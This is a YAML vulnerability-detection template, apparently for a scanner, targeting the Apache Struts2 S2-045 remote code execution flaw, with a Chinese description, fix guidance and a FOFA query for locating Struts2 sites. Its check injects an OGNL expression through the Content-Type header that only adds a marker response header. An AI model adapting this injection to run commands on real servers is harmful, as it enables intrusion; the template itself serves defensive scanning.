product: Apache-Struts2
vName: Struts2 远程命令执行漏洞(s2-045)
type: 代码执行
vID: [ ]
level: 3
vDesc: Apache Struts2 v2.3.5 - v2.3.31及v2.5 - v2.5.10存在远程代码执行漏洞(S2-045)。攻击者可通过发送恶意构造的HTTP数据包利用该漏洞，在受影响服务器上执行系统命令，进一步可完全控制该服务器，造成拒绝服务、数据泄露、网站造篡改等影响。由于该漏洞利用无需任何前置条件（如开启dmi ，debug等功能）以及启用任何插件，因此漏洞危害较为严重。
version: ''
note: ''
search:
  FOFA: app="Struts2"
protocol: http
link: ''
fix:
  - 受影响用户可升级版本至Apache Struts 2.3.32 或 Apache Struts 2.5.10.1以消除漏洞影响。
  - 如用户不方便升级，可采取如下临时解决方案：删除commons-fileupload-x.x.x.jar文件（会造成上传功能不可用）
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      header:
        Content-Type: "%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Hash','ace530fe096da14220566b6f73c16244')}.multipart/form-data"
      path: /
    verify:
      path: ''
      logic: and
      check:
        - header:
            value:
              - X-Hash
              - ace530fe096da14220566b6f73c16244
            logic: and